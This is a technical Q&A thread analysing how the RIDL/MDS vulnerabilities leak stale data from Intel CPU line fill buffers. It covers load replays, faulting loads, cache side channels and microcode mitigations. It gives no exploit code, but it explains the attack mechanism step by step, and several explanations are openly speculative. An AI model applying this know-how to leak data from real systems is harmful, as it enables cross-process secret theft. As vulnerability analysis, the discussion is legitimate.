About the RIDL vulnerabilities and the "replaying" of loads

Asked 17/5, 2019 at 13:19 Answered 18/5, 2019 at 4:56

Solved x86 cpu cpu-architecture micro-architecture cpu-mds

I'm trying to understand the RIDL class of vulnerability.

This is a class of vulnerabilities that is able to read stale data from various micro-architectural buffers.
Today the known vulnerabilities exploits: the LFBs, the load ports, the eMC and the store buffer.

The paper linked is mainly focused on LFBs.

I don't understand why the CPU would satisfy a load with the stale data in an LFB.
I can imagine that if a load hits in L1d it is internally "replayed" until the L1d brings data into an LFB signalling the OoO core to stop "replaying" it (since the data read are now valid).

However I'm not sure what "replay" actually mean.
I thought loads were dispatched to a load capable port and then recorded in the Load Buffer (in the MOB) and there being eventually hold as needed until their data is available (as signalled by the L1).
So I'm not sure how "replaying" comes into play, furthermore for the RIDL to work, each attempt to "play" a load should also unblock dependent instructions.
This seems weird to me as the CPU would need to keep track of which instructions to replay after the load correctly completes.

The paper on RIDL use this code as an example (unfortunately I had to paste it as an image since the PDF layout didn't allow me to copy it):

The only reason it could work is if the CPU will first satisfy the load at line 6 with a stale data and then replay it.
This seems confirmed few lines below:

Specifically, we may expect two accesses to be fast, not just the one corresponding to the leaked information. After all, when the processor discovers its mistake and restarts at Line 6 with the right value, the program will also access the buffer with this index.

But I would expect the CPU to check the address of the load before forwarding the data in the LFB (or any other internal buffer).
Unless the CPU actually executes the load repeatedly until it detect the data loaded is now valid (i.e. replaying).
But, again, why each attempt would unblock dependent instructions?

How does exactly the replaying mechanism work, if it even exists, and how this interacts with the RIDL vulnerabilities?

Cupped answered 17/5, 2019 at 13:19 Comment(5)

What is "eMC" ? – Proem 18/5, 2019 at 1:38

@HadiBrais Embedded Memory Controller, at least the part attached to the Ring Bus. – Cupped 18/5, 2019 at 10:49

I don't understand why the memory controller matters here. Table IV from the RIDL paper shows which hardware structures cause which vulnerability. – Proem 18/5, 2019 at 17:1

@HadiBrais Me neither. Probably I've misinterpreted the picture in the frontpage, where the eMC is highlighted in red like the other data source of the MDS vulnerabilities. – Cupped 19/5, 2019 at 18:20

Ah, that's probably an error. It's clear from the RIDL and Fallout papers that the authors (like us) don't exactly understand what is happening. – Proem 19/5, 2019 at 18:41

I don't think load replays from the RS are involved in the RIDL attacks. So instead of explaining what load replays are (@Peter's answer is a good starting point for that), I'll discuss what I think is happening based on my understanding of the information provided in the RIDL paper, Intel's analysis of these vulnerabilities, and relevant patents.

Line fill buffers are hardware structures in the L1D cache used to hold memory requests that miss in the cache and I/O requests until they get serviced. A cacheable request is serviced when the required cache line is filled into the L1D data array. A write-combining write is serviced when the any of the conditions for evicting a write-combining buffer occur (as described in the manual). A UC or I/O request is serviced when it is sent to the L2 cache (which occurs as soon as possible).

Refer to Figure 4 of the RIDL paper. The experiment used to produce these results works as follows:

The victim thread writes a known value to a single memory location. The memory type of the memory location is WB, WT, WC, or UC.
The victim thread reads the same memory location in a loop. Each load operation is followed by MFENCE and there is an optional CLFLUSH. It's not clear to me from the paper the order of CLFLUSH with respect to the other two instructions, but it probably doesn't matter. MFENCE serializes the cache line flushing operation to see what happens when every load misses in the cache. In addition, MFENCE reduces contention between the two logical cores on the L1D ports, which improves the throughput of the attacker.
An attacker thread running on a sibling logical core executes the code shown in Listing 1 in a loop. The address used at Line 6 can be anything. The only thing that matters is that load at Line 6 either faults or causes a page walk that requires an microcode assist (to set the accessed bit in the page table entry). A page walk requires using the LFBs as well and most of the LFBs are shared between the logical cores.

It's not clear to me what the Y-axis in Figure 4 represents. My understanding is that it represents the number of lines from the covert channel that got fetched into the cache hierarchy (Line 10) per second, where the index of the line in the array is equal to the value written by the victim.

If the memory location is of the WB type, when the victim thread writes the known value to the memory location, the line will be filled into the L1D cache. If the memory location is of the WT type, when the victim thread writes the known value to the memory location, the line will not be filled into the L1D cache. However, on the first read from the line, it will be filled. So in both cases and without CLFLUSH, most loads from the victim thread will hit in the cache.

When the cache line for a load request reaches the L1D cache, it gets written first in the LFB allocated for the request. The requested portion of the cache line can be directly supplied to the load buffer from the LFB without having to wait for the line to be filled in the cache. According to the description of the MFBDS vulnerability, under certain situations, stale data from previous requests may be forwarded to the load buffer to satisfy a load uop. In the WB and WT cases (without flushing), the victim's data is written into at most 2 different LFBs. The page walks from the attacker thread can easily overwrite the victim's data in the LFBs, after which the data will never be found in there by the attacker thread. All load requests that hit in the L1D cache don't go through the LFBs; there is a separate path for them, which is multiplexed with the path from the LFBs. Nonetheless, there are some cases where stale data (noise) from the LFBs is being speculatively forwarded to the attacker's logical core, which is probably from the page walks (and maybe interrupt handlers and hardware prefetchers).

It's interesting to note that the frequency of stale data forwarding in the WB and WT cases is much lower than in all of the other cases. This is could be explained by the fact that the victim's throughput is much higher in these cases and the experiment may terminate earlier.

In all other cases (WC, UC, and all types with flushing), every load misses in the cache and the data has to be fetched from main memory to the load buffer through the LFBs. The following sequence of events occur:

The accesses from the victim hit in the TLB because they are to the same valid virtual page. The physical address is obtained from the TLB and provided to the L1D, which allocates an LFB for the request (due to a miss) and the physical address is written into the LFB together with other information that describes the load request. At this point, the request from the victim is pending in the LFB. Since the victim executes an MFENCE after every load, there can be at most one outstanding load in the LFB at any given cycle from the victim.
The attacker, running on the sibling logical core, issues a load request to the L1D and the TLB. Each load is to an unmapped user page, so it will cause a fault. When the it misses in the TLB, the MMU tells the load buffer that the load should be blocked until the address translation is complete. According to paragraph 26 of the patent and other Intel patents, that's how TLB misses are handled. The address translation is still in progress the load is blocked.
The load request from the victim receives its cache line, which gets written into the LFB allcoated for the load. The part of the line requested by the load is forwarded to the MOB and, at the same time, the line is written into the L1D cache. After that, the LFB can be deallcoated, but none of the fields are cleared (except for the field that indicates that its free). In particular, the data is still in the LFB. The victim then sends another load request, which also misses in the cache either because it is uncacheable or because the cache line has been flushed.
The address translation process of the attacker's load completes. The MMU determines that a fault needs to be raised because the physical page is not present. However, the fault is not raised until the load is about retire (when it reaches the top of the ROB). Invalid translations are not cached in the MMU on Intel processors. The MMU still has to tell the MOB that the translation has completed and, in this case, sets a faulting code in the corresponding entry in the ROB. It seems that when the ROB sees that one of the uops has valid fault/assist code, it disables all checks related to sizes and addresses of that uops (and possibly all later uops in the ROB). These checks don't matter anymore. Presumably, disabling these checks saves dynamic energy consumption. The retirement logic knows that when the load is about to retire, a fault will be raised anyway. At the same time, when the MOB is informed that the translation is completed, it replays the attacker's load, as usual. This time, however, some invalid physical address is provided to the L1D cache. Normally, the physical address needs to compared against all requests pending in the LFBs from the same logical core to ensure that the logical core sees the most recent values. This is done before or in parallel with looking up the L1D cache. The physical address doesn't really matter because the comparison logic is disabled. However, the results of all comparisons behave as if the result indicates success. If there is at least one allocated LFB, the physical address will match some allocated LFB. Since there is an outstanding request from the victim and since the victim's secret may have already been written in the same LFB from previous requests, the same part of the cache line, which technically contains stale data and in this case (the stale data is the secret), will be forwarded to the attacker. Note that the attacker has control over the offset within a cache line and the number of bytes to get, but it cannot control which LFB. The size of a cache line is 64 bytes, so only the 6 least significant bits of the virtual address of the attacker's load matter, together with the size of the load. The attacker then uses the data to index into its array to reveal the secret using a cache side channel attack. This behavior would also explain MSBDS, where apparently the data size and STD uop checks are disabled (i.e, the checks trivially pass).
Later, the faulting/assisting load reaches the top of the ROB. The load is not retired and the pipeline is flushed. In case of faulting load, a fault is raised. In case of an assisting load, execution is restarted from the same load instruction, but with an assist to set the required flags in the paging structures.
These steps are repeated. But the attacker may not always be able to leak the secret from the victim. As you can see, it has to happen that the load request from the attacker hits an allocated LFB entry that contains the secret. LFBs allocated for page walks and hardware prefetchers may make it harder to perform a successful attack.

If the attacker's load didn't fault/assist, the LFBs will receive a valid physical address from the MMU and all checks required for correctness are performed. That's why the load has to fault/assist.

The following quote from the paper discusses how to perform a RIDL attack in the same thread:

we perform the RIDL attack without SMT by writing values in our own thread and observing the values that we leak from the same thread. Figure3 shows that if we do not write the values (“no victim”), we leak only zeros, but with victim and attacker running in the same hardware thread (e.g., in a sandbox), we leak the secret value in almost all cases.

I think there are no privilege level changes in this experiment. The victim and the attacker run in the same OS thread on the same hardware thread. When returning from the victim to the attacker, there may still be some outstanding requests in the LFBs from (especially from stores). Note that in the RIDL paper, KPTI is enabled in all experiments (in contrast to the Fallout paper).

In addition to leaking data from LFBs, MLPDS shows that data can also be leaked from the load port buffers. These include the line-split buffers and the buffers used for loads larger than 8 bytes in size (which I think are needed when the size of the load uop is larger than the size of the load port, e.g., AVX 256b on SnB/IvB that occupy the port for 2 cycles).

The WB case (no flushing) from Figure 5 is also interesting. In this experiment, the victim thread writes 4 different values to 4 different cache lines instead of reading from the same cache line. The figure shows that, in the WB case, only the data written to the last cache line is leaked to the attacker. The explanation may depend on whether the cache lines are different in different iterations of the loop, which is unfortunately not clear in the paper. The paper says:

For WB without flushing, there is a signal only for the last cache line, which suggests that the CPU performs write combining in a single entry of the LFB before storing the data in the cache.

How can writes to different cache lines be combining in the same LFB before storing the data in the cache? That makes zero sense. An LFB can hold a single cache line and and a single physical address. It's just not possible to combine writes like that. What may be happening is that WB writes are being written in the LFBs allocated for their RFO requests. When the invalid physical address is transmitted to the LFBs for comparison, the data may always be provided from the LFB that was last allocated. This would explain why only the value written by the fourth store is leaked.

For information on MDS mitigations, see: What are the new MDS attacks, and how can they be mitigated?. My answer there only discusses mitigations based on the Intel microcode update (not the very interesting "software sequences").

The following figure shows the vulnerable structures that use data speculation.

Proem answered 18/5, 2019 at 4:56 Comment(22)

I wasn't aware, reading the paper, that the load had to be faulting or assisted. Re-reading it, this is, instead, required. I'm taking sometime to fully re-read/grasp your answer. Please be patient :) – Cupped 18/5, 2019 at 11:21

Out of curiosity, it is correct to say that dependent uops are replayed from the ROB? – Cupped 19/5, 2019 at 18:7

@MargaretBloom That's not possible because there is no path from the ROB to the execution ports. Uops can only be replayed from the RS or the MOB. My current understanding is that when load uop misses in the LTB, it may be replayed from the load buffer to the L1D cache (not the RS) when the physical address is provided to the load buffer. On the other hand, if the virtual address of the load is itself wrong (obtained from the uop on a mispredicted path) or is not available (the load uop has been dispatched when the scheduler has predicted that the virtual address will be available... – Proem 19/5, 2019 at 18:36

...on the bypassing network but it is not because e.g., the uops that supplies the virtual address missed in the L1D cache), then load uop has to be dispatched and go through the whole load pipe (through the loose net, fine net, and MMU). Otherwise, if the virtual address is known, there is no need to go through the load pipe and unnecessarily consume a load execution port. It would be better to find patents to confirm all of this. In case of machine clears, then the load uop is re-issued from the allocator. – Proem 19/5, 2019 at 18:36

I meant from the ROB -> Scheduler -> Execution ports. The load can stay in the Load Buffer but what about subsequent dependent uops? They must stay in the scheduler I guess. So the scheduler cannot simply remove them after dispatching them. It must known they depend on a load that is possibly using speculative data. Isn't this kind of a duplication of the ROB functionalities? – Cupped 19/5, 2019 at 18:54

@MargaretBloom: I don't think there's any mechanism for copying a uop from the ROB into the scheduler. Once it's gone from the RS, it's not coming back other than a pipeline flush to an earlier state, leading to the front-end re-issuing it. So my understanding is that uops can't be removed from the RS until they've completed successfully, not just dispatched. Hadi, are you saying that the MOB lets the scheduler know when a load uop can be re-dispatched (e.g. when data arrives from off-core)? Surely the scheduler still has to track its dependencies, and not issue another uop to that port – Forta 19/5, 2019 at 19:38

@MargaretBloom: Isn't this kind of a duplication of the ROB functionalities? Not really; the ROB doesn't track dependencies, only whether or not a uop (or all the uops making up a whole instruction) have completed execution. This presumably takes 1 bit per entry, vs. the RS dropping uops for which that's the case. The ROB is presumably a circular buffer, with retirement removing contiguous completed uops at the tail (and freeing any extra resources allocated for the uop, e.g. load buffer to check for memory order mis-speculation), and issue adding uops at the head. – Forta 19/5, 2019 at 19:43

@Hadi: why this speculation is only done for loads that will cause a fault/assist? My guess: It's probably always done, but if a fault is detected then the load port just drops everything and moves on (to save power), with the "output" buffer holding whatever it did at the time. Non-faulting loads generate actual inputs for the muxers that feed the load-result output buffer either an LFB, L1d, or store-fowarding. Again this is total guess; a design that sounds plausible and explains the observations, given the little I know about CPU logic design. – Forta 19/5, 2019 at 19:49

@MargaretBloom and Peter, the fundamental difference between the ROB and the RS is that the ROB is a circular buffer and therefore maintains program order efficiently. The RS cannot efficiently determine program order. If there was no ROB, the RS has to check every cycle the order of all uops to determine whether the oldest one is ready to retire. This is obviously too inefficient. The ROB is there mainly for this purpose. There are many other diffs, of course, such as the ROB maintains different information and the RS entries can be freed earlier, but these are not fundamental differences. – Proem 19/5, 2019 at 20:24

Efficient in terms of both performance and power. But yes, there are fields that are duplicated in both the RS and ROB so that they can be accessed efficiently by both without contention. – Proem 19/5, 2019 at 20:25

@MargaretBloom Regarding replay, I went back to refresh my knowledge from Intel patents on replay (there are many of them). There are 4 different kinds of "replay": (1) replay from the RS when the scheduler mispredicts the time an operand arrives on the forwarding network (2) replay from the MOB which occurs when the access misses in the TLB (3) partial replay from the uop cache which occurs when a uop has completed execution or is being executed with the wrong operands (4)full replay which is a pipeline flush. Apparently, there can multiple concurrent replays of the same uop. How cool is that – Proem 19/5, 2019 at 20:30

@PeterCordes and HadiBrais, thank you for your answers. – Cupped 20/5, 2019 at 10:51

@HadiBrais: Those definitions of "replay" include re-issue, though. I'm not clear on "replay from the uop cache", that doesn't make sense to me because I thought the only path from uop cache to RS / execution units was via the normal front-end IDQ + issue + rename. Oh, "partial replay" may mean branch miss with fast recovery, which does discard all uops after the mispredicted branch and issue the correct path. It may rejoin the path that was already in the RS, but maybe with a different dep chain so IDK if I'd call that the same uop. It's a different instance for the same x86 instruction. – Forta 20/5, 2019 at 12:48

@PeterCordes I haven't read the patents thoroughly, so I don't have the full picture. Also different patents may apply to different microarchiectures. I think on a branch mispredict, a full relay occur. Partial replay refers to replaying selected uops that are not necessary contiguous in the program order. Although it's possible it replay uops from the RS by not freeing the RS entry when one of the operands is provided speculatively (speculative store forwarding). The RS entry is only freed when all of the operands of the uop are not speculative. The load matrix may enable such implementation. – Proem 20/5, 2019 at 15:54

@MargaretBloom I've rewritten a large part of the answer in a form of a sequence of events for better clarity. I've also added a possible explanation for why the attacker's load has to fault/assist. Let me know whether any of this makes any sense. – Proem 20/5, 2019 at 18:16

Thanks @HadiBrais, The only thing seems off to me is "At the same time, when the MOB is informed that the translation is completed, it replays the attacker's load, as usual." but at this time the attacker load never executed yet if I followed the points correctly. Side note: I was under the impression that what happen is that the scheduler dispatches the load and the dependent uops assuming the load will hit in L1. I.e. it will make the dependent uops get their input from the writeback/forward network ... – Cupped 20/5, 2019 at 18:58

This network is a mux fed from the LFB, L1d and the split registers (at least), the real source is selected correctly if the physical address is known by the time the dependent uops read from it (thank to a TLB hit). But if the phys addr is missing (TLB miss or non-present PTE) or the load is faulting (this'll save energy) the network reuses the last used configuration, leaking the data. If the load is faulting it is not replayed, if it is assisted it will be replayed when the MMU signals the MOB it has the phy addr. – Cupped 20/5, 2019 at 18:59

However, this model differs from points 2 and 5 and you have a patent backing them up, so I guess your is the correct one. – Cupped 20/5, 2019 at 18:59

@MargaretBloom In the terminology I'm using, sending the virtual address of the load to the TLB is one step of executing the load uop. The replay involves re-executing those steps that have already been executed; it doesn't necessarily mean full re-execution. Regarding the other comment, I think there needs to be a request to the L1D to get any data; I mean the (stale) data cannot just by itself appear on the forwarding network without a request. That's why I think the MOB doesn't care whether a fault occurred and it will just replay the load anyway and get stale data. – Proem 20/5, 2019 at 19:36

Meltdown is similar except that the attacker loads from a kernel address with a valid translation. The MOB doesn't care that the privilege check has failed, but in this case, the load will proceed normally with a valid physical address. In RIDL, an invalid physical address seems to be used and the actual physical address is only provided after handling the fault/assist. – Proem 20/5, 2019 at 19:36

@Margaret, FWIW my impression of how it works is exactly as your comment and the next one describe. That is, that the core mechanism is that the dependent uops of the attacker's load assume the load result will appear on the bypass network with the best possible timing (L1 hit) and use whatever values they find there even if there wasn't a hit, which ends up being whatever was connected to the bypass network by the last thing that used that port/bypass path. – Novocaine 10/4, 2020 at 15:1

If the attacker load hits, of course it means the right data is there. If the attacker's load misses in L1 (but didn't fault/TLB miss) the bypass network apparently still contains something, but not a leaked secret from the LFB (assuming they tried this). Or maybe it does get soemthign stale from the LFB in that case but recovery is fast enough that it doesn't get leaked by the subsequent probe. – Novocaine 10/4, 2020 at 15:4

replay = being dispatched again from the RS (scheduler). (This isn't a complete answer to your whole question, just to the part about what replays are. Although I think this covers most of it, including unblocking dependent uops.)

parts of this answer have a misunderstanding about load replays.

See discussion in chat - uops dependent on a split or cache-miss load get replayed, but not the load itself. (Unless the load depends on itself in a loop, like I had been doing for testing >.<). TODO: fix the rest of this answer and others.

It turns out that a cache-miss load doesn't just sit around in a load buffer and wake up dependent uops when the data arrives. The scheduler has to re-dispatch the load uop to actually read the data and write-back to a physical register. (And put it on the forwarding network where dependent uops can read it in the next cycle.)

So L1 miss / L2 hit will result in 2x as many load uops dispatched. (The scheduler is optimistic, and L2 is on-core so the expected latency of an L2 hit is fixed, unlike time for an off-core response. IDK if the scheduler continues to be optimistic about data arriving at a certain time from L3.)

The RIDL paper provides some interesting evidence that load uops do actually directly interact with LFBs, not waiting for incoming data to be placed in L1d and just reading it from there.

We can observe replays in practice most easily for cache-line-split loads, because causing that repeatedly is even more trivial than cache misses, taking less code. The counts for uops_dispatched_port.port_2 and port_3 will be about twice as high for a loop that does only split loads. (I've verified this in practice on Skylake, using essentially the same loop and testing procedure as in How can I accurately benchmark unaligned access speed on x86_64)

Instead of signalling successful completion back to the RS, a load that detects a split (only possible after address-calculation) will do the load for the first part of the data, putting this result in a split buffer¹ to be joined with the data from the 2nd cache line the 2nd time the uop dispatches. (Assuming that neither time is a cache miss, otherwise it will take replays for that, too.)

When a load uop dispatches, the scheduler anticipates it will hit in L1d and dispatches dependent uops so they can read the result from the forwarding network in the cycle the load puts them on that bus.

If that didn't happen (because the load data wasn't ready), the dependent uops will have to be replayed as well. Again, IIRC this is observable with the perf counters for dispatch to ports.

Existing Q&As with evidence of uop replays on Intel CPUs:

Why does the number of uops per iteration increase with the stride of streaming loads?
Weird performance effects from nearby dependent stores in a pointer-chasing loop on IvyBridge. Adding an extra load speeds it up?
How can I accurately benchmark unaligned access speed on x86_64 and Is there a penalty when base+offset is in a different page than the base?
Understanding the impact of lfence on a loop with two long dependency chains, for increasing lengths points out that the possibility of replay mean the RS needs to hold on to a uop until an execution unit signals successful completion back to the RS. It can't drop a uop on first dispatch (like I guessed when I first wrote that answer).

Footnote 1:

We know there are a limited number of split buffers; there's a ld_blocks.no_sr counter for loads that stall for lack of one. I infer they're in the load port because that makes sense. Re-dispatching the same load uop will send it to the same load port because uops are assigned to ports at issue/rename time. Although maybe there's a shared pool of split buffers.

RIDL:

Optimistic scheduling is part of the mechanism that creates a problem. The more obvious problem is letting execution of later uops see a "garbage" internal value from an LFB, like in Meltdown.

http://blog.stuffedcow.net/2018/05/meltdown-microarchitecture/ even shows that meltdown loads in PPro expose various bits of microarchitectural state, exactly like this vulnerability that still exists in the latest processors.

The Pentium Pro takes the “load value is a don’t-care” quite literally. For all of the forbidden loads, the load unit completes and produces a value, and that value appears to be various values taken from various parts of the processor. The value varies and can be non-deterministic. None of the returned values appear to be the memory data, so the Pentium Pro does not appear to be vulnerable to Meltdown.

The recognizable values include the PTE for the load (which, at least in recent years, is itself considered privileged information), the 12th-most-recent stored value (the store queue has 12 entries), and rarely, a segment descriptor from somewhere.

(Later CPUs, starting with Core 2, expose the value from L1d cache; this is the Meltdown vulnerability itself. But PPro / PII / PIII isn't vulnerable to Meltdown. It apparently is vulnerable to RIDL attacks in that case instead.)

So it's the same Intel design philosophy that's exposing bits of microarchitectural state to speculative execution.

Squashing that to 0 in hardware should be an easy fix; the load port already knows it wasn't successful so masking the load data according to success/fail should hopefully only add a couple extra gate delays, and be possible without limiting clock speed. (Unless the last pipeline stage in the load port was already the critical path for CPU frequency.)

So probably an easy and cheap fix in hardware for future CPU, but very hard to mitigate with microcode and software for existing CPUs.

Forta answered 17/5, 2019 at 14:36 Comment(13)

So a dependent uop will be kept in the RS until the load is marked as successfully completed? Basically, each uop has a "Successfully executed" bit that is valid iif it is set in the uop itself and in all previous uop (which is easy to check since the RS is filled in order). So it's the optimistic nature of the scheduler at fault with RIDL. – Cupped 17/5, 2019 at 15:4

@MargaretBloom: Every uop stays in the RS until it itself is successfully executed. Once a uop has successfully executed, it's dropped from the RS entirely making room for new ones. (But yes the ROB will have a bit to track "executed", i.e. ready to retire if/when retirement gets through all previous successfully executed uops. Checking previous uop status probably doesn't happen until retirement.) Even detection of a branch miss isn't a problem: all uops from after the mis-speculation are discarded from the ROB + RS anyway, and the correct path fed in from issue/rename. – Forta 17/5, 2019 at 15:14

@MargaretBloom: updated my answer with a rewrite of my 2nd (now deleted) comment. – Forta 17/5, 2019 at 15:30

Intel is releasing a ucode update with a new command (or instruction) to be used to clear all uarch buffer on a privileged context switch. So maybe squashing the load value to 0 is not always possible (e.g. in case of TLB miss?) or that fix will be released on new generations. – Cupped 18/5, 2019 at 10:55

@MargaretBloom: Like I said in my answer, it should be easy to fix with a change to the design of the fixed-function hardware (a new uarch), but not with just a microcode update for existing hardware. CPUs aren't FPGAs that can be arbitrarily reconfigured by microcode; microcode can only use existing hooks provided by the HW to e.g. disable or flush stuff. (e.g. Skylake microcode disables the loop buffer instead of just fixing the bug, because the designers made it possible for ucode to do that, presumably in case of the discovery of such a bug. The P5 FDIV and F00F bugs inspired caution!) – Forta 18/5, 2019 at 11:4

Apparently, flushing the affected buffers is an existing hook since that's what Intel is releasing for existing CPUs. So the last phrase don't seem totally correct. – Cupped 18/5, 2019 at 11:12

@MargaretBloom: presumably it takes multiple uops to do it, though; I'm not totally surprised they were able to cobble together a microcode sequence that sets internal state to "safe" values, maybe by abusing uops intended for something else. Like maybe storing zeros do some dummy address that won't actually write to physical memory anywhere? Anyway, the last paragraph of my answer is still valid; a new MSR to write to trigger manual flush won't help much to defend a Javascript sandbox against webasm from within the same process: no context switch. – Forta 18/5, 2019 at 11:18

(The "new instruction" added for Spectre microcode mitigation is actually a new MSR you can write to. That's the only hook Intel has for adding completely new things in microcode because the actual decoders are partly fixed-function; it wouldn't have been possible to add an actual new instruction with its own opcode. But MSR write/read are basically hooks into microcode with a "call number" and one input or output arg. It's safe to assume the new hook for this will also be an MSR write.) – Forta 18/5, 2019 at 11:21

Very true indeed! BTW thanks for the addeddum on RIDL. – Cupped 18/5, 2019 at 11:26

@MargaretBloom and Peter, the microcode update augments the behavior of the VERW instruction so that it gets decoded into many more uops. These additional uops are memory load and store uops that simply overwrite all of the MDS-affected buffers with some safe value (e.g., zero). These are equivalent to the software sequences shown by Intel, which can be used for processors without the microcode update. VERW has always been microcoded on all processors that support it. So the update (among other things) changes the microcode routine of VERW and it doesn't change anything else. – Proem 18/5, 2019 at 17:15

@HadiBrais: ah, so that makes it available for user-space, unlike adding another MSR. Neat. – Forta 18/5, 2019 at 17:22

I remember discussing cache-line split registers with you in some comment section on Stack Overflow, but I can't find it. Do you remember where? – Proem 18/5, 2019 at 18:0

@HadiBrais: no, I don't, and google isn't finding it. Sometimes site:stackoverflow.com "cordes" ... finds discussions I've had in comments, but either I missed it or google it wasn't in the results. – Forta 18/5, 2019 at 18:49